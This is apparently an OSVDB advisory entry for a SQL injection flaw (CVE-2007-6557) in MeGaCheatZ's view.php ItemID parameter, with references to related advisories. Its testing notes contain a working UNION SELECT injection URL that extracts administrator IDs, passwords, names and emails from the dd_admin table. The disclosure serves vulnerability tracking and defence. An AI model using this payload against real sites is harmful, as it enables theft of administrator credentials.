MeGaCheatZ view.php ItemID Variable SQL Injection

2007-12-19T00:00:00
ID OSVDB:40025
Type osvdb
Reporter OSVDB
Modified 2007-12-19T00:00:00

Description

Manual Testing Notes

http://[target]/view.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10+from+dd_admin/*

References:

Related OSVDB ID: 1020366 Related OSVDB ID: 40026 Other Advisory URL: http://www.inj3ct-it.org/exploit/megacheatz.1.1.txt Generic Exploit URL: http://www.milw0rm.com/exploits/4778 CVE-2007-6557 Bugtraq ID: 26999